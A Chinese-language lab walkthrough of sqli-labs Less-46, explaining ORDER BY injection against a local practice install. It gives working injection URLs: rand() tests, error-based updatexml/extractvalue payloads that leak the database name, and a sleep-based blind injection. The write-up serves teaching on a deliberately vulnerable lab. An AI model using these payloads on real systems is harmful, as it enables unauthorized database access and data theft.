sqli-labs(less-46)order by 注入

我们打开sql-labs的第46关然后在输入框内输入?id=1时会发现页面没有任何的变化,此时我们用Visual Studio Code查看第46关的代码

此时我们发现sql语句是sql = "SELECT \* FROM users ORDER BY id"; ,所以现在我们需要了解一下order by语句的作用。

在SQL语句中,asc是指定列按升序排列,desc则 是指定列按降序排列。
select * from users order by 1 desc; 使用降序进行排列
select * from users order by 1 asc;使用升序进行排列

这时我们就知道了,sql语句只有order by后面的参数是我们可控的,所以我们可以输入?sort=1,在这里sort=1的意思就是以第一列数据也就是id进行排序。

sql 复制代码
http://127.0.0.1/sincer/Less-46/?sort=1
sql 复制代码
http://127.0.0.1/sincer/Less-46/?sort=2

此时我们输入?sort=2,就是以USERNAME进行排序。

输入?sort=3时,会以PASSWORD进行排序。

当我们输入?sort=4时会报错,因为没有第四列。

注入点测试

sql 复制代码
127.0.0.1/sincer/less-46/?sort=rand(true)
sql 复制代码
http://127.0.0.1/sincer/less-46/?sort=rand(false)

报错注入(获取表名)

sql 复制代码
http://127.0.0.1/sincer/less-46/?sort=1%20and%20updatexml(1,concat(0x7e,(database()),0x7e),1)

或者

sql 复制代码
http://127.0.0.1/sincer/less-46/?sort=(extractvalue(1,concat(0x7e,(database()),0x7e)))--+

时间盲注

sql 复制代码
http://127.0.0.1/sincer/Less-46/?sort=1%20and%20if(substr(database(),1,1)=%27s%27,1,sleep(1))--+
相关推荐
ClouGence1 小时前
保障公共安全,一线治安机构实时数据应用与实践
数据库·mysql·postgresql
烟漠河洛1 小时前
线上事故复盘:Redis幂等性设计边界没覆盖跨状态请求,订单状态机直接崩了
数据库·redis·缓存
Minxinbb1 小时前
TDSQL for MySQL 服务器重启操作
数据库·mysql·dba
SelectDB1 小时前
Doris 实战:用 Colocate Join 消除 Shuffle,AB 指标计算性能提升 145 倍 🚀
数据库·性能优化·ab测试
PawSQL2 小时前
PawSQL 技术月报 | 2026年6月
数据库·sql·tdsql·pawsql·sql审核
SelectDB2 小时前
Apache Doris 在 AgentLogsBench 中领先,支撑 Agent 可观测性生产负载
运维·数据库·agent
聚美智数2 小时前
黄历查询-运势查询-国际法定节假日查询-API接口介绍
android·java·数据库
夜影风4 小时前
Redis集群创建时出现“Node xxx.xxx is not empty”问题处理
数据库·redis·缓存
utf8mb4安全女神5 小时前
【Redis数据库】哨兵集群/redis集群/安装配置/主从复制/数据持久化操作/数据结构/安全限制/PHP redis/
linux·服务器·数据结构·数据库·redis·缓存
lzz的编码时刻5 小时前
Liquibase 入门实战教程
数据库·运维开发